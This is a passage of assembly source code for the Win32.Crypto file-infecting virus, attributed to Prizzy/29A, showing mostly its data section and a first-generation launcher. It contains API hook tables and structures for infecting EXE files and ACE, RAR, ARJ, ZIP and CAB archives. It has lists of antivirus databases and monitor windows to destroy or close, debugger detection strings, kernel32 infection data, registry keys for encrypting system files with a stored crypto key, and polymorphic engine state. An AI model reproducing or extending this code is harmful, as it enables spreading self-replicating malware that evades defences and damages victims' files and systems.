szFreeLibrary:		__macro_CRC32 <FreeLibrary>
			db	0, 0, 0, 0, 13, "ADVAPI32.DLL", 0
	advapi32_name	equ $ - 13
szCryptAcquireContextA: __macro_CRC32 <CryptAcquireContextA>
szCryptExportKey:	__macro_CRC32 <CryptExportKey>
szCryptImportKey:	__macro_CRC32 <CryptImportKey>
szCryptGetUserKey:	__macro_CRC32 <CryptGetUserKey>
szCryptGetProvParam:	__macro_CRC32 <CryptGetProvParam>
szCryptGenKey:		__macro_CRC32 <CryptGenKey>
szCryptEncrypt: 	__macro_CRC32 <CryptEncrypt>
szCryptDecrypt: 	__macro_CRC32 <CryptDecrypt>
szCryptDestroyKey:	__macro_CRC32 <CryptDestroyKey>
szCryptReleaseContext:	__macro_CRC32 <CryptReleaseContext>
szRegOpenKeyExA:	__macro_CRC32 <RegOpenKeyExA>
szRegQueryValueExA:	__macro_CRC32 <RegQueryValueExA>
szRegQueryInfoKeyA:	__macro_CRC32 <RegQueryInfoKeyA>
szRegEnumValueA:	__macro_CRC32 <RegEnumValueA>
szRegSetValueExA:	__macro_CRC32 <RegSetValueExA>
szRegCreateKeyExA:	__macro_CRC32 <RegCreateKeyExA>
szRegCloseKey:		__macro_CRC32 <RegCloseKey>
			db	0, 0, 0, 0, 11, "USER32.DLL", 0
	user32_name	equ $ - 11
szSetTimer:		__macro_CRC32 <SetTimer>
szKillTimer:		__macro_CRC32 <KillTimer>
szFindWindowA:		__macro_CRC32 <FindWindowA>
szPostMessageA: 	__macro_CRC32 <PostMessageA>
szCharUpperBuffA:	__macro_CRC32 <CharUpperBuffA>
			db	0, 0, 0, 0, 0	;end of table

	Hooked_API_functions:	;1st value = orig. adr ... 2nd = new function
hfCreateFileW		dd  offset myCreateFileA - 5, offset myCreateFileW
hfCreateFileA		dd  offset myOpenFile	 - 5, offset myCreateFileA
hfOpenFile		dd  offset my_lopen	 - 5, offset myOpenFile
hf_lopen		dd  offset myCopyFileW	 - 5, offset my_lopen

hfCopyFileW		dd  offset myCopyFileA	 - 5, offset myCopyFileW
hfCopyFileA		dd  offset myMoveFileW	 - 5, offset myCopyFileA
hfMoveFileW		dd  offset myMoveFileA	 - 5, offset myMoveFileW
hfMoveFileA		dd  offset myMoveFileExW - 5, offset myMoveFileA
hfMoveFileExW		dd  offset myMoveFileExA - 5, offset myMoveFileExW
hfMoveFileExA		dd  offset myLoadLibraryW- 5, offset myMoveFileExA

hfLoadLibraryW		dd  offset myLoadLibraryA    - 5, offset myLoadLibraryW
hfLoadLibraryA		dd  offset myLoadLibraryExW  - 5, offset myLoadLibraryA
hfLoadLibraryExW	dd  offset myLoadLibraryExA  - 5, offset myLoadLibraryExW
hfLoadLibraryExA	dd  offset myFreeLibrary     - 5, offset myLoadLibraryExA
hfFreeLibrary		dd  offset EndOfNewFunctions - 5, offset myFreeLibrary

		; common valuez

gdt_flags		dd	00000000h	;fixed & remote disks
file_infected		dd	00000000h	;number of infected files

		; copyright

szAuthor		db	"Win32.Crypto, (c)oded by Prizzy/29A",13,10
			db	"Greetz to Darkman, Benny and GriYo"

;ÄÄÄ´ archivez struct ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		; ACE,RAR SFX information

Archive_MagicWhere:

  ACE_MagicWhere	dw	0,ACENeededBytes;ACE archive (*.ACE)
			dw	05C00h,300h	;ACE-SFX (DOS)
			dw	0DE00h,2200h	;ACE-SFX English/German
						;(Win 95/98, NT 4.x)

  RAR_MagicWhere	dw	0,20		;RAR archive (*.RAR)
			dw	2400h,800h	;RAR-SFX (DOS)
			dw	5000h,800h	;RAR-SFX (Win 95/98, NT 4.x)

  ACE_Magic		db	'**ACE**'
  ACE_Magic_Length	equ	07
  RAR_Magic		db	'Rar!',1Ah,7,0
  RAR_Magic_Length	equ	07

		; ACE archivez struct

ACE_h_struct	    equ this byte
  ACEhHeadCrc		dw	0000h
  ACEhHeadSize		dw	0000h
  ACEhHeadType		db	00h
  ACEhHeadFlags 	dw	0000h
  ACEhSignature 	db	'**ACE**'
ACE_h_struct_finish equ this byte

ACE_h_struct_continue	struc			;this structure ain't
  ACEhVerMod		db	00h		;neccessary for RAR's
  ACEhVerCr		db	00h		;opeartions
  ACEhHostCr		db	00h
  ACEhVolumeNumber	db	00h
  ACEhTimeDate		dd	00000000h
  ACEhReserved1 	dw	0000h
  ACEhReserved2 	dw	0000h
  ACEhReserved3 	dd	00000000h
  ACEhAvSize		db	00h
  ACEhAv		equ	ThisPlace
  ACEhCommentSize	dw	0000h
  ACEhComment		equ	ThisPlace
			ends

ACE_f_struct		struc			;this structure ain't
  ACEfHeadCRC		dw	0000h		;neccessary for RAR's
  ACEfHeadSize		dw	0000h		;opeartions
  ACEfHeadType		db	00h
  ACEfHeadFlags 	dw	0000h
  ACEfCompressedSize	dd	00000000h
  ACEfUnCompressedSize	dd	00000000h
  ACEfTimeDate		dd	00000000h
  ACEfAttrib		dd	00000000h
  ACEfCRC32		dd	00000000h
  ACEfTechType		db	00h
  ACEfTechQual		db	00000000h
  ACEfTechParm		dw	0000h
  ACEfReserved		dw	0000h
  ACEfFilenameSize	dw	0000h
  ACEfFilename		db	8+1+3 dup (00h)
			ends

ACENeededBytes		equ ACE_h_struct_finish - ACE_h_struct

		; RAR archivez struct

  RARSignature		db 'Rar!',1Ah,7,0	;RAR's signature (v1.5+)
  RARSignature_Length	equ 07			;seven bytes

RAR_struct	    equ this byte
  RARHeaderCRC		dw 0000h
  RARHeaderType 	db 00h
  RARFileFlags		dw 0000h
  RARHeaderSize 	dw 0000h
RAR_struct_finish   equ this byte

RAR_struct_continue	struc			;this structure ain't
  RARCompressedSize	dd 00000000h		;neccessary for RAR's
  RARUncompressedSize	dd 00000000h		;opeartions
  RARHostOS		db 00h
  RARFileCRC		dd 00000000h
  RARDateTime		dd 00000000h
  RARVersionNeed	db 00h
  RARMethod		db 00h
  RARFileNameSize	dw 0000h
  RARFileAttribute	dd 00000000h
  RARFileName		db 8+1+3 dup(00h)
			ends

RARNeededBytes	    equ RAR_struct_finish - RAR_struct

		; ARJ archivez struct

ARJ_struct	    equ this byte
  ARJHeaderId		dw	0EA60h
  ARJHeaderSize 	dw	0000h
  ARJ1HeaderSize	db	00h
  ARJVersionDone	db	00h
  ARJVersionNeed	db	00h
  ARJHostOS		db	00h
  ARJFlags		db	00h
  ARJMethod		db	00h
  ARJType		db	00h
  ARJReserved		db	00h
  ARJDateTime		dd	00000000h
  ARJCompressedSize	dd	00000000h
ARJ_struct_finish   equ this byte

ARJ_struct_continue	struc			;this structure ain't
  ARJUncompressedSize	dd	00000000h	;neccessary for ARJ's
  ARJFileCRC		dd	00000000h	;opeartions
  ARJEntryname		dw	0000h
  ARJAccessMode 	dw	0000h
  ARJHostData		dw	0000h
  ARJFilename		db	8+1+3 dup(00h)	;from this it isn't exact,
  ARJComment		db	00h		;ARJFilename has not 8+1+3
  ARJHeaderCRC		dd	00000000h	;size
  ARJExtHeader		dw	0000h
  ARJEnd		dw	0EA60h, 0000h
			ends

ARJNeededBytes	    equ ARJ_struct_finish - ARJ_struct
ARJGetSizeOnly	    equ ARJVersionDone - ARJ_struct

		; ZIP archivez struct

ZIPInfoBuffer	    equ this byte		;thanks to ZIP's structs
  ZIPRHeaderId		db	'PK'		;from Vecna's "El Inca"
  ZIPRSignature 	db	01h, 02h	;virus
  ZIPRVerMade		dw	000Ah
  ZIPRVerNeed		dw	000Ah
  ZIPRFlags		dw	0000h
  ZIPRMethod		dw	0000h
  ZIPRTimeDate		dd	00000000h
  ZIPRCRC32		dd	00000000h
  ZIPRCompressed	dd	00000000h
  ZIPRUncompressed	dd	00000000h
  ZIPRSizeFilename	dw	0000h
  ZIPRExtraField	dw	0000h
  ZIPRCommentSize	dw	0000h
  ZIPRDiskNumba 	dw	0000h
  ZIPRInternalAttr	dw	0000h
  ZIPRExternalAttr	dd	00000000h
  ZIPROffsetLHeaderR	dd	00000000h
  ZIPRFilename		db	8+1+3 dup (00h)
ZIPRHeaderSize	    equ ZIPRFilename - ZIPRHeaderId
ZIPRScanSize1	    equ ZIPRSizeFilename - ZIPRHeaderId
ZIPRScanSize2	    equ ZIPRFilename - ZIPRSizeFilename
ZIPRScanSize3	    equ ZIPROffsetLHeaderR - ZIPRSizeFilename

ZIPMHeaderBuffer	struc			;this structure ain't
  ZIPLHeaderId		db	'PK'		;neccessary for ZIP's
  ZIPLSignature 	dw	0403h		;operations
  ZIPLVersionNeed	dw	0000h
  ZIPLFlags		dw	0000h
  ZIPLMethod		dw	0000h
  ZIPLDateTime		dd	00000000h
  ZIPLCRC32		dd	00000000h
  ZIPLCompressed	dd	00000000h
  ZIPLUncompressed	dd	00000000h
  ZIPLSizeFilename	dw	0000h
  ZIPLExtraField	dw	0000h
  ZIPLFilename		db	8+1+3 dup (00h)
			ends
ZIPMScanSize	    equ ZIPLSizeFilename - ZIPMHeaderBuffer
ZIPMFilename	    equ ZIPLFilename - ZIPMHeaderBuffer

ZIPReadBuffer	    equ this byte
  ZIPEHeaderId		db	'PK'
  ZIPSignature		dw	0000h
  ZIPNoDisk		dw	0000h
  ZIPNoStartDisk	dw	0000h
  ZIPEntryDisk		dw	0000h
  ZIPEntrysDir		dw	0000h
  ZIPSizeDir		dd	00000000h
  ZIPOffsetDir		dd	00000000h
  ZIPCommentLenght	dw	0000h
ZIPEHeaderSize	    equ this byte - offset ZIPReadBuffer

		; CAB achivez struct

CAB_h_struct	    equ this byte
  CABh_Magic		db	'MSCF'		;"MSCF" signature
  CABh_Reserved1	dd	00000000h	;reserved
  CABh_FileSize 	dd	00000000h	;file size of this cabinet
  CABh_Reserved2	dd	00000000h	;reserved
  CABh_FirstRec 	dd	00000000h	;offset of the 1st entry
  CABh_Reserved3	dd	00000000h	;reserved
  CABh_VersionMin	db	00h		;CAB file format version
  CABh_VersionMaj	db	00h		;curently: 0x0103
  CABh_nFolders 	dw	0000h		;number of folders
  CABh_nFiles		dw	0000h		;number of files
  CABh_Flags		dw	0000h		;1=exist its prev. cabinet
						;2=exist its next  cabinet
						;4=exist its reser. field
  CABh_ID		dw	0000h		;identification number
  CABh_Number		dw	0000h		;number of cab (0=the first)
CAB_h_finish	    equ this byte

CAB_reserved		struct
  CABr_length		dw	0000h		;if CABh_Flags=4
  CABr_reserved 	equ	this byte
			ends

CAB_directory_start equ this byte
  CABd_FirstRec 	dd	00000000h	;offset of the 1st dir
  CABd_nData		dw	0000h		;number of cfDATA structz
  CABd_Compress 	dw	0000h		;compression type
  CABd_Reserved 	equ	this byte	;this can be reserved area

CAB_file_start	    equ this byte
  CABf_UnCompSize	dd	00000000h	;file size (uncompressed)
  CABf_FileStart	dd	00000000h	;offset of the file
  CABf_Flags		dw	0000h		;0000=file in folder #0
						;0001=file in folder #1
						;FFFD=file from prev
						;FFFE=file to next
						;FFFF=file prev_and_next
  CABf_Date		dw	1234h		;date
  CABf_Time		dw	1234h		;time
  CABf_Attribs		dw	0020h		;attr of the file
  CABf_FileName 	db	8+1+3 dup (00h) ;file_name + 00h
			db	00h

CAB_entry	    equ this byte
  CABe_CRC		dd	00000000h	;checksum of this entry
  CABe_Compr		dw	0000h		;compressed size
  CABe_UnCompr		dw	0000h		;uncompressed size
  CABe_Compr_data	equ	this byte

		; generate command for archiver programs by this table
		; include compress method, archives filenames, and ">nul"
		; note: 32=20h because of i'm using DN (and it does optim.)

ArchiverCommand db	' a -ep -std -m'	,05h,'12345'   ;ACE
		db	' a -ep',32,32,32,32,32,32, \
				    '-m'	,05h,'12345'   ;RAR
		db	' a -e',32,32,32,32,32,32,32, \
				    '-m'	,04h,'1234 '   ;ARJ
		db	' -a'  ,32,32,32,32,32,32,32,32,32, \
				    '-e'	,04h,'xnfs '   ;PKZIP

ArchiverCommandSize	equ 0000000Eh		;lenght of one command
ArchiverCommandRealSize equ 00000014h		;lenght of command + c. method

		; I must find these programs by hyper infection
		; the 1st value means - 00h = only extension, 01h = name
		; the 4th value means - 00h = search, 01h = don't search
		; the 5th value means - jump there, if found
		; the 6th value means - useful value for that function

HyperTable	db	01h,'PKZIP.EXE'   , 00h, 00h
		dd	offset archive_act, offset NewZIP
		db	01h,'ARJ.EXE'	  , 00h, 00h
		dd	offset archive_act, offset NewARJ
		db	01h,'RAR.EXE'	  , 00h, 00h
		dd	offset archive_act, offset NewRAR
		db	01h,'ACE.EXE'	  , 00h, 00h
		dd	offset archive_act, offset NewACE
		db	00h,'.EXE'	  , 00h, 00h
		dd	offset infect_file, 00000000h
		db	00h,'.ZIP'	  , 00h, 00h  ;Internet's archive
		dd	offset infect_file, 00000000h
		db	00h,'.ARJ'	  , 00h, 00h  ;Old archive
		dd	offset infect_file, 00000000h
		db	00h,'.RAR'	  , 00h, 00h  ;User's archive
		dd	offset infect_file, 00000000h
		db	00h,'.ACE'	  , 00h, 00h  ;Hacker's archive
		dd	offset infect_file, 00000000h
		db	00h,'.CAB'	  , 00h, 00h  ;Fucking MicroSoft's
		dd	offset infect_file, 00000000h ;archive format
		db	01h,'AVP.CRC'	  , 00h, 00h
		dd	offset kill_av	  , 00000000h
		db	01h,'IVP.NTZ'	  , 00h, 00h
		dd	offset kill_av	  , 00000000h
		db	01h,'ANTI-VIR.DAT', 00h, 00h
		dd	offset kill_av	  , 00000000h
		db	01h,'CHKLIST.MS'  , 00h, 00h
		dd	offset kill_av	  , 00000000h
		db	01h,'CHKLIST.CPS' , 00h, 00h
		dd	offset kill_av	  , 00000000h
		db	01h,'SMARTCHK.MS' , 00h, 00h
		dd	offset kill_av	  , 00000000h
		db	01h,'SMARTCHK.CPS', 00h, 00h
		dd	offset kill_av	  , 00000000h
		db	01h,'AGUARD.DAT'  , 00h, 00h
		dd	offset kill_av	  , 00000000h
		db	01h,'AVGQT.DAT'   , 00h, 00h
		dd	offset kill_av	  , 00000000h
		db	01h,'LGUARD.VPS'  , 00h, 00h  ;AVAST's viruses data-
		dd	offset kill_avast , 00000000h ;base, hack its !!!
		db	0FFh

HyperTable_OneSize  equ 0000000Fh		      ;size of ext field
HyperTable_HalfSize equ 00000009h		      ;size of pointers

gen_archive_number	equ	10
gen_archive_filename	db	0,7,'install', 1,5,'setup', 0,3,'run', \
				0,5,'sound',   0,6,'config',0,4,'help', \
				1,6,'gratis',  1,5,'crack', 1,6,'update', \
				1,6,'readme'

		; Hyper Infection - kernel32 internal values

HyperInfection_k32	dd	00000000h	;actived from "kernel32" ?
HyperInfection_timerID	dd	00000000h	;timer identification

		; AVAST's viruses database

AVAST_newSize	equ	514847			;this size + <0,50Kb)
AVAST_memSize	equ	AVAST_newSize + 100h

		; some AV monitors

kill_AV 	equ	this byte
		db	'AVG Control Center',0			;AVG Grisoft
		db	'Avast32 -- Rezidentní podpora',0	;AVAST32 (CZ)
		db	'AVP Monitor',0 			;AVP
		db	'Amon Antivirus Monitor',0		;AMON English
		db	'Antivírusový monitor Amon',0		;AMON Slovak
kill_AV_num	equ	5			;four monitors

		; some debuggers

kill_SoftICE	db	'\\.\SICE',0		;SoftICE 95/98
kill_SoftICE_NT db	'\\.\NTICE',0		;SoftICE NT/2k

		; kernel infection

kernel_name	db	'\KERNEL32.DLL',0
kernel_name_len equ	$ - kernel_name
it_is_kernel	dd	00000000h	;infect kernel via "infect_file" ?

		; do not infected table (thanx Lord Julus/29A for this tbl)

avoid_table	db 'TB'     ,00h,'F-'	  ,00h,'AW'	,00h,'AV'    ,00h
		db 'NAV'    ,00h,'PAV'	  ,00h,'RAV'	,00h,'NVC'   ,00h
		db 'FPR'    ,00h,'DSS'	  ,00h,'IBM'	,00h,'INOC'  ,00h
		db 'ANTI'   ,00h,'SCN'	  ,00h,'VSAF'	,00h,'VSWP'  ,00h
		db 'PANDA'  ,00h,'DRWEB'  ,00h,'FSAV'	,00h,'SPIDER',00h
		db 'ADINF'  ,00h,'SONIQUE',00h,'SQSTART',00h,01h

		; Microsoft Cryptography functions, what a dream {:-D

crypto_KeyName	db	'Prizzy/29A',0		;my new crypto-key
crypto_Action	dd	00000000h		;exists crypto functions ?
crypto_loadKey	dd	00000000h		;has key been loaded ?

crypto_Provider dd	00000000h		;CSP provider
crypto_Key	dd	00000000h		;CPS key
crypto_XchgKey	dd	00000000h		;exportable CSP key

crypto_BlobLen	dd	00000000h		;simple blob key length
crypto_BlobKey	dd	00000000h		;simple blob key pointer
crypto_BlobHan	dd	00000000h		;simple blob key reg handle

crypto_mainProcId dd	00000000h
crypto_mainThread dd	00000000h		;main (crypto) thread handle
crypto_thread	dd	00000000h		;thread parameter
CT_LOADKEY	equ	1			;get key handle
CT_CRYPTFILE	equ	2			;crypt_file function
CT_DECRYPTFILE	equ	4			;decrypt_file function
crypto_thread_err dd	00000000h		;set LastError flag

crypto_unFiles	db 'SFC'     ,00h,'MPR'     ,00h,'OLE32'   ,00h
		db 'NTDLL'   ,00h,'GDI32'   ,00h,'RPCRT4'  ,00h
		db 'USER32'  ,00h,'RSASIG'  ,00h,'SHELL32' ,00h
		db 'CRYPT32' ,00h,'RSABASE' ,00h,'PSTOREC' ,00h
		db 'KERNEL32',00h,'ADVAPI32',00h,'RUNDLL32',00h
		db 'SFCFILES',00h,01h

crypto_unReg32	db	"System\CurrentControlSet\Control\SessionManager\KnownDLLs",0
crypto_unReg16	db	"System\CurrentControlSet\Control\SessionManager\Known16DLLs",0

crypto_unReg	equ	this byte
		dd	offset crypto_unReg32
		dd	offset crypto_unReg16
crypto_unReg_E	equ	this byte

crypto_mainMutex db	"Crypto:mainThread",0
crypto_mutex	db	"Crypto:Mutex",0
crypto_library	dd	00000000h		;libraries information
crypto_nLib	dd	00000000h		;number of items

crypto_Register db	"SOFTWARE\Microsoft\Cryptography\UserKeys\Prizzy/29A",0
crypto_RegWhere db	"EPbK",0
crypto_RegFlag	db	"Kiss Of Death",0

		align	dword			;filesize divided by eight
		dd	00000000h		;only for multi-layer poly

;ÄÄÄ´ memory buffer which ain't in file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
file_end:

		; working with filez

filename_ptr	dd	00000000h	;pointer to a filename
filename_size	equ	260		;MAX_SIZE defined by M$
filename	db	filename_size dup (00h)
file_handle	dd	00000000h	;open file handle
file_hmap	dd	00000000h	;mapped file handle
file_hmem	dd	00000000h	;mapped file in memory
file_hsize	dd	00000000h	;file size + virus size
last_error	dd	00000000h	;buffer for file operations

		; hyper infection

search_filename db	filename_size dup (00h)
search_start	db	00h		;have we begun yet ?
search_address	dd	00000000h	;address of dta's in memory
search_plunge	db	00h		;how many dirz we have in
search_handle	dd	00000000h	;FindFirstFile handle
search_table	dd	00000000h	;position in HyperTable
dta		dta_struc <00h> 	;main dta struc for search_handle
time		sysTime_struc <00h>	;time for my new hyper_infection

		; file infected co-processor structs

exp_truncate	dw	0000h			;copro status flags
exp_default	dw	0000h			;copro status flags
exp_further	dd	00000000h		;copro number's buffer

decimal_places	dd	00000000h		;dec_place=modf(num,&int)

		; new infection method (compressed, inside archive)

AProgram	struc
program 	dd	00000000h		;where's place program
dropper 	dd	00000000h		;where's place dropper
		ends

NewArchive	equ	this byte
NewArchiveNum	equ	00000005h
NewArchiveSize	equ	size AProgram

NewACE		AProgram <00h>
NewRAR		AProgram <00h>
NewARJ		AProgram <00h>
NewZIP		AProgram <00h>
NewCAB		AProgram <00h>

FileTime	File_Time <00h> 		;get/set archive infect flag
SystemTime	sysTime_struc <00h>		;convert FileTime to SystemT

		; CreateProcess structures

ProcessInformation    Process_Information <00h> ;info about process
StartupInfo	      Startup_Info	  <00h> ;window's info

		; Coprocessor buffer - natural logarithm

copro_nl_buffer db	128 dup (00h)		;all regz + all flagz

		; data used by Prizzy Polymorphic Engine (PPE-II)

poly_seed	dd	00000000h		;last number in get_rnd32 function
garbage_style	db	00h			;have I use unmodify flags instructions ?

used_regs	db	00h			;used eax,ecx,edx...
gl_index_reg	db	00h			;which reg is index ?
gl_index_reg2	db	00h			;more complex - no comment :)

mem_address	dd	00000000h		;where's copy of this virus
poly_start	dd	00000000h		;where poly decoder start
poly_finish	dd	00000000h		;where poly decoder finish
recursive_level db	00h			;garbage recursive layer

index_reg	db	00h			;index_reg in base-reg
mlayer_reg	db	00h			;mlayer_reg in base-reg
code_reg	db	00h			;code_reg in base-reg

code_value	dd	00000000h		;startup code value
code_value_add	dd	00000000h		;next_code = code + this_c
crypt_style	db	00h			;(0=add/1=sub/2=xor) [---],reg32

decoder_back	dd	00000000h		;address for JNZ loop
compare_index	db	00h			;where in <compare_buffer>
compare_buffer	dd	5 dup(00000000h)	;see <g_compare> for more info

mem_end:

;ÄÄÄ´ first generation ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

first_generation:

		; after installing, run it above
		mov	[__pllg_lsize],00000000h
		mov	dword ptr [original_ep], \
			offset __fg_run_this - offset virus_start + 1000h
		jmp	virus_start

	__fg_run_this:
		; display a simple message box
		push	MB_OK
		@pushsz "Win32.Crypto - welcome to my world..."
		@pushsz "First generation sample"
		push	0
		call	MessageBoxA

		; exit program - haha huahaha <program> :))
		push	0
		call	ExitProcess

;ÄÄÄ´ end of virus ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
end first_generation